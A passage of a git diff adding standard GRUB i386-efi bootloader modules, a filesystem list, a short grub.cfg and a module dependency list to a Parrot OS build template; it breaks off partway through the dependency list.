b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/font.mod new file mode 100644 index 00000000..512ea062 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/font.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fs.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fs.lst new file mode 100644 index 00000000..a069ccc6 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/fs.lst @@ -0,0 +1,36 @@ +affs +afs +bfs +btrfs +cbfs +cpio +cpio_be +exfat +ext2 +fat +hfs +hfsplus +iso9660 +jfs +minix +minix2 +minix2_be +minix3 +minix3_be +minix_be +newc +nilfs2 +ntfs +odc +procfs +reiserfs +romfs +sfs +squash4 +tar +udf +ufs1 +ufs1_be +ufs2 +xfs +zfs diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_arcfour.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_arcfour.mod new file mode 100644 index 00000000..708920a4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_arcfour.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_blowfish.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_blowfish.mod new file mode 100644 index 00000000..0e1f2d0c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_blowfish.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_camellia.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_camellia.mod new file mode 100644 index 00000000..d0458e77 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_camellia.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_cast5.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_cast5.mod new file mode 100644 index 00000000..045089a7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_cast5.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_crc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_crc.mod new file mode 100644 index 00000000..14f64e14 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_crc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_des.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_des.mod new file mode 100644 index 00000000..d2dd8a0d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_des.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_dsa.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_dsa.mod new file mode 100644 index 00000000..8e9a932f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_dsa.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_idea.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_idea.mod new file mode 100644 index 00000000..b77118ea Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_idea.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_md4.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_md4.mod new file mode 100644 index 00000000..8774971f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_md4.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_md5.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_md5.mod new file mode 100644 index 00000000..9ca1a62e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_md5.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rfc2268.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rfc2268.mod new file mode 100644 index 00000000..fc670b16 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rfc2268.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rijndael.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rijndael.mod new file mode 100644 index 00000000..e31009dc Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rijndael.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rmd160.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rmd160.mod new file mode 100644 index 00000000..290299e4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rmd160.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rsa.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rsa.mod new file mode 100644 index 00000000..1709a2a6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_rsa.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_seed.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_seed.mod new file mode 100644 index 00000000..1ee13756 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_seed.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_serpent.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_serpent.mod new file mode 100644 index 00000000..8a4632da Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_serpent.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha1.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha1.mod new file mode 100644 index 00000000..ae68798e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha1.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha256.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha256.mod new file mode 100644 index 00000000..f7f1566b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha256.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha512.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha512.mod new file mode 100644 index 00000000..ff5980e2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_sha512.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_tiger.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_tiger.mod new file mode 100644 index 00000000..8bf28855 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_tiger.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_twofish.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_twofish.mod new file mode 100644 index 00000000..8b28367c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_twofish.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_whirlpool.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_whirlpool.mod new file mode 100644 index 00000000..5ba60a9f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gcry_whirlpool.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gdb.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gdb.mod new file mode 100644 index 00000000..f4f1fdc9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gdb.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/geli.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/geli.mod new file mode 100644 index 00000000..3a3c2afd Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/geli.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gettext.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gettext.mod new file mode 100644 index 00000000..dda84ca9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gettext.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxmenu.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxmenu.mod new file mode 100644 index 00000000..595e6df0 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxmenu.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm.mod new file mode 100644 index 00000000..9a619196 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm_background.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm_background.mod new file mode 100644 index 00000000..95b6e74a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm_background.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm_menu.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm_menu.mod new file mode 100644 index 00000000..3cd9ec09 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gfxterm_menu.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gptsync.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gptsync.mod new file mode 100644 index 00000000..c681073c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gptsync.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/grub.cfg b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/grub.cfg new file mode 100644 index 00000000..fcf488c1 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/grub.cfg @@ -0,0 +1,12 @@ +insmod part_acorn +insmod part_amiga +insmod part_apple +insmod part_bsd +insmod part_dfly +insmod part_dvh +insmod part_gpt +insmod part_msdos +insmod part_plan +insmod part_sun +insmod part_sunpc +source /boot/grub/grub.cfg diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gzio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gzio.mod new file mode 100644 index 00000000..4eb2ac71 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/gzio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/halt.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/halt.mod new file mode 100644 index 00000000..569be0ea Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/halt.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hashsum.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hashsum.mod new file mode 100644 index 00000000..82834886 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hashsum.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hdparm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hdparm.mod new file mode 100644 index 00000000..0ccda583 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hdparm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/help.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/help.mod new file mode 100644 index 00000000..9bd82c14 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/help.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hexdump.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hexdump.mod new file mode 100644 index 00000000..96011bed Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hexdump.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfs.mod new file mode 100644 index 00000000..8d4246ec Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfsplus.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfsplus.mod new file mode 100644 index 00000000..0fa5680d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfsplus.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfspluscomp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfspluscomp.mod new file mode 100644 index 00000000..7b0fb8e4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/hfspluscomp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/http.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/http.mod new file mode 100644 index 00000000..3d768e80 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/http.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/iorw.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/iorw.mod new file mode 100644 index 00000000..89b30c6e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/iorw.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/jfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/jfs.mod new file mode 100644 index 00000000..440d486e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/jfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/jpeg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/jpeg.mod new file mode 100644 index 00000000..25ed462c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/jpeg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/keylayouts.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/keylayouts.mod new file mode 100644 index 00000000..0348d451 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/keylayouts.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/keystatus.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/keystatus.mod new file mode 100644 index 00000000..8ba33ed6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/keystatus.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ldm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ldm.mod new file mode 100644 index 00000000..9bb92b27 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ldm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/legacy_password_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/legacy_password_test.mod new file mode 100644 index 00000000..b3a3c025 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/legacy_password_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/legacycfg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/legacycfg.mod new file mode 100644 index 00000000..36fae8b1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/legacycfg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linux.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linux.mod new file mode 100644 index 00000000..d3638f5f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linux.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linux16.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linux16.mod new file mode 100644 index 00000000..9e3a8591 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linux16.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linuxefi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linuxefi.mod new file mode 100644 index 00000000..a1b82e1e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/linuxefi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loadbios.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loadbios.mod new file mode 100644 index 00000000..427e2009 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loadbios.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loadenv.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loadenv.mod new file mode 100644 index 00000000..fb0169ba Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loadenv.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loopback.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loopback.mod new file mode 100644 index 00000000..bce5a35b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/loopback.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ls.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ls.mod new file mode 100644 index 00000000..8986f88e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/ls.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsacpi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsacpi.mod new file mode 100644 index 00000000..2031534d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsacpi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefi.mod new file mode 100644 index 00000000..0f987df9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefimmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefimmap.mod new file mode 100644 index 00000000..910b8d89 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefimmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefisystab.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefisystab.mod new file mode 100644 index 00000000..d0429ed3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsefisystab.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsmmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsmmap.mod new file mode 100644 index 00000000..9dd19968 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lsmmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lspci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lspci.mod new file mode 100644 index 00000000..af16a559 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lspci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lssal.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lssal.mod new file mode 100644 index 00000000..cb4183fa Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lssal.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/luks.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/luks.mod new file mode 100644 index 00000000..9cbbc117 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/luks.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lvm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lvm.mod new file mode 100644 index 00000000..110c2b99 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lvm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lzopio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lzopio.mod new file mode 100644 index 00000000..1a52595a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/lzopio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/macbless.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/macbless.mod new file mode 100644 index 00000000..ca874d67 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/macbless.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/macho.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/macho.mod new file mode 100644 index 00000000..a72f5fbd Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/macho.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid09.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid09.mod new file mode 100644 index 00000000..de7489ff Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid09.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid09_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid09_be.mod new file mode 100644 index 00000000..42705b91 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid09_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid1x.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid1x.mod new file mode 100644 index 00000000..d4e1d624 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mdraid1x.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/memrw.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/memrw.mod new file mode 100644 index 00000000..f1b2f382 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/memrw.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minicmd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minicmd.mod new file mode 100644 index 00000000..0d2cb6a5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minicmd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix2.mod new file mode 100644 index 00000000..c4b93d46 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix2_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix2_be.mod new file mode 100644 index 00000000..56dfe080 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix2_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix3.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix3.mod new file mode 100644 index 00000000..2547b28c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix3.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix3_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix3_be.mod new file mode 100644 index 00000000..5e031279 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix3_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix_be.mod new file mode 100644 index 00000000..0c1b06f4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/minix_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mmap.mod new file mode 100644 index 00000000..8c30e8f3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/mmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/moddep.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/moddep.lst new file mode 100644 index 00000000..689a5d4b --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/i386-efi/moddep.lst @@ -0,0 +1,258 @@ +squash4: xzio gzio lzopio fshelp +search_fs_uuid: +lssal: +legacycfg: gcry_md5 crypto password normal +date: datetime normal +bfs: fshelp +uhci: usb +multiboot2: boot video net acpi relocator mmap +gcry_twofish: crypto +cpio_be: archelp +priority_queue: +gcry_rijndael: crypto +echo: extcmd +cpio: archelp +xzio: crypto +part_sun: +hfspluscomp: gzio hfsplus +gcry_sha512: crypto +gcry_cast5: crypto +efi_gop: video video_fb +ctz_test: functional_test +boot: +setjmp_test: setjmp functional_test +odc: archelp +ls: extcmd normal +gzio: +cbmemc: cbtable terminfo normal +video: +test_blockarg: extcmd normal +linuxefi: boot +gfxterm: video font +cbtable: +mul_test: functional_test +gcry_tiger: crypto +gcry_serpent: crypto +aout: +macbless: disk +gcry_blowfish: crypto +appleldr: boot +trig: +extcmd: +at_keyboard: boot keylayouts +videoinfo: video +testspeed: extcmd normal +minix: +keylayouts: +xnu_uuid: gcry_md5 +usbtest: usb +usbms: usb scsi +reboot: relocator +morse: +help: extcmd normal +part_msdos: +http: net +gdb: backtrace serial +gcry_rsa: mpi verify +cbtime: cbtable +blocklist: +probe: extcmd +pbkdf2: crypto +lsefisystab: +gcry_rfc2268: crypto +ufs1_be: +nativedisk: +gcry_camellia: crypto +fat: fshelp +exfctest: functional_test +parttool: normal +lzopio: crypto +linux: boot video relocator mmap +gcry_md4: crypto +zfsinfo: zfs +usb_keyboard: keylayouts usb +gcry_md5: crypto +fshelp: +ehci: boot usb cs5536 +datetime: +bitmap_scale: bitmap +ata: scsi +usbserial_common: usb serial +syslinuxcfg: extcmd normal +net: priority_queue boot datetime bufio +gcry_des: crypto +div_test: div functional_test +time: +reiserfs: fshelp +dm_nv: diskfilter +datehook: datetime normal +mdraid09_be: diskfilter +cmp_test: functional_test +backtrace: +ahci: boot ata +kernel: +video_cirrus: video video_fb +part_plan: +gcry_seed: crypto +minix_be: +crypto: +video_colors: +test: +terminal: +part_dvh: +lsacpi: extcmd acpi +jpeg: bufio bitmap +bsd: boot video aout extcmd gcry_md5 crypto cpuid elf relocator serial mmap +memdisk: +gfxmenu: video gfxterm trig bitmap_scale video_colors bitmap normal font +cmp: +acpi: extcmd mmap +xfs: fshelp +elf: +div: +cpuid: extcmd +affs: fshelp +usb: +videotest: video gfxmenu font +tr: extcmd +testload: +relocator: mmap +play: +gfxterm_menu: video_fb functional_test procfs normal font +cbfs: archelp +adler32: crypto +progress: normal +password: crypto normal +part_sunpc: +video_fb: +tftp: priority_queue net +sleep: extcmd normal +serial: extcmd terminfo +search_fs_file: +gcry_sha256: crypto +gcry_rmd160: crypto +exfat: fshelp +search: search_fs_uuid extcmd search_fs_file search_label +mdraid09: diskfilter +chain: boot net efinet +mpi: crypto +memrw: extcmd +cs5536: +password_pbkdf2: gcry_sha512 pbkdf2 crypto normal +mdraid1x: diskfilter +linux16: boot video relocator mmap +gcry_crc: crypto +configfile: normal +zfscrypt: gcry_rijndael extcmd pbkdf2 crypto 